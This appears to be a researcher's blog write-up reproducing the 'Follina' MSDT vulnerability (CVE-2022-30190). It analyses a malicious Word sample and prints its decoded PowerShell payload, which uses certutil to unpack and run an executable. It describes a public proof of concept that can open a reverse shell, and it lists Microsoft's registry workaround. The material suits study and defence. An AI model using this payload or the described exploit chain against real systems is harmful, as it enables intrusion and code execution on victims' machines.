Reproduction of CVE-2022–30190 Zero-day Vulnerability “Follina”
On Monday, May 30, 2022, Microsoft issued CVE-2022–30190, a zero-day remote code execution (RCE) vulnerability in the Microsoft Support Diagnostic Tool (MSDT).
I would like to share my notes I took while testing this critical vulnerability.
First, Nao_sec discovered a malicious office document that was submitted from Belarus.
This malicious document retrieves a HTML content from a remote server using “ms-msdt” scheme to execute Powershell commands on a target machine. The technique doesn’t require any user interaction, when a victim opened a malicious office document, code execution will be achieved.
MSDT is a diagnostic tool that collects information and sends it to Microsoft for analysis when users encounter certain issues.
Who is Vulnerable?
Before testing, you need to be sure that you’re testing the vulnerable version of Office.
I had Office365 Current Channel version 2205 build 15225.20204. So I downgraded the Office to Semi-Annual Enterprise Channel — 2108–14326.20962. You can see the update history for Office365 here.
I used following commands to downgrade ( thanks to this reddit entry) :
cd %programfiles%\\Common Files\\Microsoft Shared\\ClickToRun
OfficeC2RClient.exe /changesetting Channel=Broad
OfficeC2RClient.exe /update user
OfficeC2RClient.exe /update user updatetoversion=14326.20962
OfficeC2RClient.exe /update user
Technical Analysis
The office document flagged as malicious by 37 security vendors on Virustotal(01.06.2022). You can also see the details and quick behavior analysis of the document here.
I downloaded to sample document from app.any.run that shows dynamic analysis of the malware.
When you unzip the file, you will see all components of the Office document.
Inside the word/_rels/document.xml.rels file, there is an external reference to hxxps[:]//www.xmlformats.com/office/word/2022/wordprocessingDrawing/RDF842l.html! (no longer online). This link takes us to the remote server that includes powershell commands to execute on the target Windows machine.
When you look at the dynamic analysis on app.any.run, you can see the html content that starts with a large amount of “A” letters in comments. These letters are used to make file size 4096 bytes and necessary to invoke the exploit. For more information → https://billdemirkapi.me/unpacking-cve-2021-40444-microsoft-office-rce/
At the end of the script, a code block uses ms-msdt scheme and includes base64 encoded data.
When it’s decoded, we can see some powershell commands.
$cmd = "c:\\windows\\system32\\cmd.exe";
Start-Process $cmd -windowstyle hidden -ArgumentList "/c taskkill /f /im msdt.exe";
Start-Process
$cmd -windowstyle hidden -ArgumentList "/c cd
C:\\users\\public\\&&for /r %temp% %i in (05-2022-0438.rar) do copy
%i 1.rar /y&&findstr TVNDRgAAAA 1.rar>1.t&&certutil
-decode 1.t 1.c &&expand 1.c -F:* .&&rgb.exe";This process (this part was received from Huntress blog);
Starts hidden windows to:
- Kill msdt.exe if it is running
- Loop through files inside a RAR file, looking for a Base64 string for an encoded CAB file
- Store this Base64 encoded CAB file as 1.t
- Decode the Base64 encoded CAB file to be saved as 1.c
- Expand the 1.c CAB file into the current directory, and finally:
- Execute rgb.exe (presumably compressed inside the 1.c CAB file)
As you can see an attacker can execute any command depending on her/his purposes and get initial access without using macros with a single-click.
PoC
You can use the following proof of concepts published by some security researchers.
https://gist.github.com/tothi/66290a42896a97920055e50128c9f040
I chose John Hammond’s PoC for my test.
When you run the python script, it creates a maldoc and serves an html payload. I transferred the follina.doc to the Windows machine. ( via social engineering techniques in real life) When I opened the file, a calculator started with the windows troobleshooter. (the script executes calc command). You can also change the command using -c parameter.
When you use -r parameter with a port number, you can get reverse shell from the target machine.
If you enable Pre-view on Windows explorer, the commands will be triggered when you just select the document without opening. (zero click)
Workaround Solutions from Microsoft
Microsoft is still working on a permanent fix, and it has published steps for disabling the MSDT URL protocol via Command Prompt.
- Run Command Prompt as Administrator.
- To back up the registry key, execute the command “reg export HKEY_CLASSES_ROOT\ms-msdt filename“
- Execute the command “reg delete HKEY_CLASSES_ROOT\ms-msdt /f”.
How to undo the workaround
- Run Command Prompt as Administrator.
- To restore the registry key, execute the command “reg import filename”
